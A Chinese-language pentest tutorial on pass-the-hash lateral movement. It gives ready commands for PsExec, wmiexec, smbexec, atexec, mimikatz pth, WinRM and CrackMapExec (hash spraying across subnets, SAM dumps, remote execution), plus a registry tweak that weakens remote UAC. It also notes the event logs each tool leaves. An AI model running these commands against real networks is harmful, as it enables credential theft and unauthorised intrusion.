PTH的几种食用姿势

PTH

PTH（pass the hash）也叫做hash传递。在内网渗透中是一种很经典的攻击方式，原理就是攻击者可以直接通过NTLM Hash（mimikatz或其他手段抓取到的密码hash）访问远程主机或服务，而不用提供明文密码。因为在Windows中通常会用NTLM进行身份认证，hash值由系统API生成，如果攻击者获得了hash，就能够跳过调用API生成hash的过程，在身份验证的时候模拟该用户。

从winows 2008开始(包括2008)，rid不为500的用户，windows都不允许远程连接(包括net use、at、winrm等)，所以如果想对目标机远程执行命令，必须使用目标机rid 500的账号(通常为administrator)或域管账号。

PsExec

0x00 PsExec简介

PsExec 是由 Mark Russinovich 创建的 Sysinternals Suite中包含的工具，基于445端口 走SMB协议，NTLM认证。最初，它旨在作为系统管理员的便利工具，以便他们可以通过在远程主机上运行命令来执行维护任务。PsExec是一个轻量级的telnet替代工具，它使您无需手动安装客户端软件即可执行其他系统上的进程，并且可以获得与命令控制台几乎相同的实时交互性。PsExec最强大的功能就是在远程系统和远程支持工具（如ipconfig、whoami）中启动交互式命令提示窗口，以便显示无法通过其他方式显示的有关远程系统的信息。

0x01 食用姿势

### 前提条件：开启admin$（映射C:\\Windows目录）且关闭Remote UAC
## 针对远程建立连接的方式有两种，一种先建立IPC通道连接，然后直接使用，操作如下：
# 先net use 连接上IPC
 net use \\192.168.0.1\ipc$ "password123!@#" /user:alibaba
# 确认是否进入IPC会话
.\PsExec64.exe -accepteula \\ip -s cmd.exe   弹cmd
.\PsExec64.exe -accepteula \\ip -u administrator -p 123456 -i -d cmd /c start http://www.baidu.com
## 另一种时在psexec的参数中指定账户密码  操作如下：
.\PsExec64.exe \\192.168.0.1 –u administrator –p password

0x02 执行原理

1.通过ipc$连接，释放psexecsvc.exe到目标
2.通过服务管理SCManager远程创建psexecsvc服务，并启动服务。
3.客户端连接执行命令，服务端启动相应的程序并执行回显数据。
4.运行完后删除服务。这个在windows的日志中有详细的记录，另外psexec在少数情况下会出现服务没删除成功的bug（可在命令行下执行exit退出），所以一般不推荐使用psexec，推荐wmiexec

首先进行TCP三次握手连接目标445端口

通过SMB协议协商使用SMB协议的版本

进行NTLM认证，发送SESSION_SETUP_ANDX协商请求，包括username和pass hash

写入PSEXECSVC.exe文件，远程调用svcctl协议启动psexesvc服务

psexec必须调用svcctl协议，否则psexesvc服务无法启动

0x03 关于PsExec的日志

psexec成功登录退出后，会在目标机器的安全日志中产生Event 4624、4628、4634，在系统日志中产生Event 7045（记录PSEXESVC安装）、Event 7036（记录PSEXESVC服务状态）

0x04 Remote UAC的延展测试

UAC是什么？UAC是微软在Windows Vista 以后版本引入的一种安全机制，可以阻止未经授权的应用程序自动进行安装，并防止无意中更改系统设置。那么对于防御是不是不改UAC，保持默认或更高就可以了？并不是，可以改注册表的嘛。

方法二：

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem添加新DWORD值，键值：LocalAccountTokenFilterPolicy 为1。

WMI

0x00 WMI简介

WMI的全名为“Windows Management Instrumentation”。从Windows 98开始，Windows操作系统都支持WMI。WMI是由一系列工具集组成的，可以在本地或者远程管理计算机系统。

使用WMIC横向移动连接远程主机，需要目标主机开放135和445端口。

(135 端⼝是 WMIC 默认的管理端⼝，wimcexec 使⽤445端⼝传回显)

WMI相比于PsExec更隐蔽些

0x01 食用姿势

###  远程连接
## 直接使用wmic使用明文密码连接（未利用IPC$）
.\wmiexec.exe admin:admin@192.168.124.165
.\wmiexec.exe 用户名:明文密码@ip 
## PTH
.\wmiexec.exe -hashes LM Hash:NT Hash 域名/用户名@目标IP    // 哈希传递获得shell
.\wmiexec.exe -hashes f0d412bd764ffe81aad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 admin@192.168.124.165   // 哈希传递获得shell 
.\wmiexec.exe -hashes f0d412bd764ffe81aad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 admin@192.168.124.165 "ipconfig"   // 执行命令
.\wmiexec.exe -hashes LM Hash:NT Hash 域名/用户名@目标IP "ipconfig"   // 执行命令
-hashes 471991a8c33ff1593f1ad458bdd6f0c5 central.com.br\Administrator "ipconfig"

ps：获取的当前shell权限为此用户权限

smbexec

0x00 smbexec简介

smbexec可以通过文件共享在远程系统中执行命令。

需要开启c$共享，445端口。

0x01 食用姿势

## 在3389或类似于3389环境下
# 明文密码
.\smbexec.exe 用户名:密码@ip
.\smbexec.exe admin:admin@192.168.124.165
# hash
.\smbexec.exe -hashes :NTLMhash 用户名@ip
.\smbexec.exe -hashes :209c6174da490caeb422f3fa5a7ae634 admin@192.168.124.165
## 在socks环境下
.\smbexec.exe rootkit/用户名:密码@ip
.\smbexec.exe -hashes :NTLMhash rootkit/用户名@ip

ps：这里成功后获得的是system权限 ，所以后面如果环境允许，可以利用smbexec配合cme或者cs拿到system权限的shell或机器。

atexec

0x00 atexec简介

atexec是通过windows计划任务执行远程命令，atexec是一个半交互的工具，即参数中添加需要在远程主机执行的命令，工具执行后即返回命令结果，适用于webshell下，也适用于其他网络环境。

0x01 食用姿势

用法大致与smbexec相同

## 在3389或类似于3389环境下
# 明文密码
.\atexec.exe 用户名:密码@ip
.\atexec.exe admin:admin@192.168.124.165
# hash
.\atexec.exe -hashes :NTLMhash 用户名@ip
.\atexec.exe -hashes :209c6174da490caeb422f3fa5a7ae634 admin@192.168.124.165
## 在socks环境下
.\atexec.exe rootkit/用户名:密码@ip
.\atexec.exe -hashes :NTLMhash rootkit/用户名@ip

mimikatz

0x01 食用姿势

mimikatz的食用方法有些许奇怪

privilege::debug
sekurlsa::pth /user:admin /domain:workgroup /ntlm:209c6174da490caeb422f3fa5a7ae634

# 传文件
copy <file-path\file> \\ip\ipc$  或者
copy <file-path\file> \\ip\c$    或者
copy <file-path\file> \\ip\admin$ 
# 计划任务
at \\ip 时间 程序名，如：
at \\127.0.0.0 11:00 love.exe

如下图，在新弹出的cmd中net use连接即可，后续可通过copy或at命令进行上线或权限维持。

net use

net use将计算机与网络其他计算机共享资源连接或断开，或者显示关于计算机共享连接的信息，或者切断计算机与共享资源的连接(删除磁盘映射)，当不带选项使用本命令时，它会列出计算机的连接。

# 列出所有共享资源
net use
# 建立IPC$
net use \\ip\ipc$ "<password>" /user:<username>
# 删除IPC$
net use \\ip\ipc$ /delete
# 传文件
copy <file-path\file> \\ip\ipc$  或者
copy <file-path\file> \\ip\c$    或者
copy <file-path\file> \\ip\admin$ 
# 计划任务
at \\ip 时间 程序名，如：
at \\127.0.0.1 9:00 calc.exe

WinRM

0x00 WinRM简介

WinRM（Windows Remote Managementd）是windows操作系统的一部分，基于Web服务管理(WS-Management)标准。是一项允许管理员在系统上远程执行管理任务的服务。一般是监听在5985端口（HTTP），HTTPS协议监听在596端口上，默认支持Kerberos和NTLM身份验证。使用此服务需要管理员级别的凭据。

WinRM服务将在Windows Server 2008和更高版本上自动启动（在Windows Vista中，需要手动启动该服务）。

默认情况下，未配置WinRM侦听器。即使WinRM服务正在运行，也无法接收或发送请求数据的WS-Management协议消息。

0x01 搭建WinRM服务

环境：

win 2008 R2 --> WinRM

win7 攻击机

# 将网络连接类型改为“专用” win7的话改为工作网络winrm quickconfig//针对winrm service 进行基础配置winrm e winrm/config/listener//查看winrm service listener:winrm set winrm/config/service/auth @{Basic="true"}//为winrm service 配置authwinrm set winrm/config/service @{AllowUnencrypted="true"}//为winrm service 配置加密方式为允许非加密winrm enumerate winrm/config/listener//winrm service返回信息则启动配置成功# 将目标计算机添加到 TrustedHosts 配置设置，TrustedHosts=”*”代表所有IP都可尝试连接到此计算机的WinRM服务，这里类似于白名单机制。winrm quickconfig -qwinrm set winrm/config/Client @{TrustedHosts=”*”}# 攻击机和环境靶机都需要处于专用网络或者在域内之后可以netstat -an看一下端口 5985开启就说明正常启动WinRM了

0x02 食用姿势

winrs.exe ,基于命令行的工具，此工具作为客户端使用，用于远程连接运行WinRM的服务器并执行大多数的cmd命令

winrs -? 可以查看帮助，Winrs事件作为Microsoft-Windows-WinRM / Operational（事件ID 91）记录在远程主机上。

常用姿势

# 远程执行命令winrs -r:http://ip:5985 -u:用户名 -p:密码 "ipconfig"# 创建新线程启动calcwinrm invoke Create wmicimv2/win32_process @{CommandLine="calc.exe"} -r:http://ip:5985 -u:administrator -p:密码winrm invoke Create wmicimv2/win32_process @{CommandLine="calc.exe"} -r:http://192.168.124.167:5985 -u:administrator -p:z123456.

不过不知道为什么没弹calc，但是calc的线程是起来了。

crackmapexec

一款强大的内网横向的工具

功能很多 这里只介绍几个常用到的

# 扫描c段445crackmapexec smb 192.168.124.0/24

# 指定单一用户与密码进行c段扫描crackmapexec smb 192.168.124.0/24 -u admin -p admin --pass-pol

带有黄色的＂Pwn3d!＂意味着我们在这台机器上拥有管理员权限

# 列出当前c段所有可用共享crackmapexec smb 192.168.124.0/24 -u admin -p admin --shares

# PTH，指定hash进行横向crackmapexec smb 192.168.124.0/24 -u admin -H 209c6174da490caeb422f3fa5a7ae634 --pass-pol

# -H和-p参数都可指定文件去批量跑c段（--pass-pol），同理也可跑共享（--shares）crackmapexec smb 192.168.124.0/24 -u ./user.txt -H hash.txt --pass-pol

# winrm同理，只不过没有--pass-pol参数了crackmapexec winrm 192.168.124.0/24 -u user.txt -H hash.txt

# --sam dump主机hashcrackmapexec smb 192.168.124.165 -u admin -H 209c6174da490caeb422f3fa5a7ae634 --sam

# -x 执行命令，默认使用wmi执行命令（这里可以通过--exec-method参数指定smbexec来获得system权限执行命令）crackmapexec smb 192.168.124.165 -u admin -H 209c6174da490caeb422f3fa5a7ae634 -x "whoami"crackmapexec smb 192.168.124.165 -u admin -H 209c6174da490caeb422f3fa5a7ae634 -x "whoami" --exec-method smbexec

Reference

https://www.anquanke.com/post/id/222746

http://cn0sec.cn/index.php/archives/53/

https://www.cnblogs.com/sup3rman/p/12381874.html

https://ishare.ifeng.com/c/s/7qiKOFLV4ZM

https://cloud.tencent.com/developer/article/1802241

https://www.freebuf.com/articles/system/259632.html

https://www.anquanke.com/post/id/84980